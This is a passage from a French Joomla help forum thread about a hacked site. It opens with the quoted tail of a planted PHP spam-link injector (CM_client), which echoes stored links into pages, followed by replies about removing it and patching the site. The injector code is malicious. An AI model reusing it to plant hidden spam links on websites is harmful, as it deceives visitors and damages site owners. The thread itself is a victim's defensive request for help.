                          			for ($i = 1; $i <= $n; $i++) {
                          
                          				if ($offset > 0 && $i <= $offset)
                          
                          					array_shift($this->_links_page);
                          
                          				else
                          
                          					$links[] = array_shift($this->_links_page);
                          
                          			}
                          
                          
                          
                          			$html = join($this->_links_delimiter, $links);
                          
                          					
                          
                          		} else {
                          
                          			$html = $this->_links_page;
                          
                          		}
                          
                          
                          
                          		if ($this->_show_code)
                          
                          			$html = $html . '<!--CM'.($this->_id).'-->';
                          
                          
                          
                          		return $html;
                          
                          
                          
                          	}
                          
                          
                          
                          
                          
                            function set_data($data) {
                          
                          
                          
                          		$this->_links_page = $data;
                          
                          
                          
                            }
                          
                          }
                          
                          
                          
                          
                          
                          $CM = new CM_client();
                          
                          echo $CM->return_links();
                          
                          
                          
                          
                          
                          
                          
                          ?>
                          
                          </div>

                          Commentaire


                          • #14
                            Re : probleme site pirate, help, c'est urgent

                            Re,
                            il était où et il s'appelle comment ? Parce que in fine tu dois arriver dans un ficher Joomla sinon ce n'est jamais "appelé".

                            Après la vraie question est comment c'est arrivé là... Et pour que ça ne se reproduise pas (pas trop vite) boucher les failles : mise à jour de Joomla, des extensions, abandons des extensions critiques, mis en place de mesures de protection (crawtrack et crawlprotect...)
                            Schtroumpfe toi le Schtroumpf t'aidera.
                            Je ne schtroumpfe pas aux demandes de schtroumpf par MP.

                            Commentaire


                            • #15
                              Re : probleme site pirate, help, c'est urgent

                              mon probleme n'est pas fini,

                              après suppression du fichier links.db contenant les mots nefastes, au debut celui-ci se reecrivait , enfin une fois changer les droits d'acces le fichier est bien supprimer, mais le code contenu dans links.db est toujours visible sur la page code source et par ctrl +f
                              (v-i-a-g-r-a et cialis).


                              svp aidez-moi je n'en voit pas la fin

                              Commentaire

                              Annonce

                              Réduire
                              1 sur 2 < >

                              C'est [Réglé] et on n'en parle plus ?

                              A quoi ça sert ?
                              La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                              Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                              Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                              Comment ajouter la mention [Réglé] à votre discussion ?
                              1 - Aller sur votre discussion et éditer votre premier message :


                              2 - Cliquer sur la liste déroulante Préfixe.

                              3 - Choisir le préfixe [Réglé].


                              4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                              2 sur 2 < >

                              Assistance au forum - Outil de publication d'infos de votre site

                              Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                              Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                              Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                              UTILISER À VOS PROPRES RISQUES :
                              L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                              Problèmes connus :
                              FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                              Installation :

                              1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                              Archive zip : https://github.com/AFUJ/FPA/zipball/master

                              2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                              3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                              4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                              5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                              6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                              et remplacer www. votresite .com par votre nom de domaine


                              Exemples:
                              Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/
                              Pour executer le script: http://www..com/fpa-fr.php

                              Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/cms/
                              Pour executer le script: http://www..com/cms/fpa-fr.php

                              En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                              Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                              Voir plus
                              Voir moins
                              Travaille ...
                              X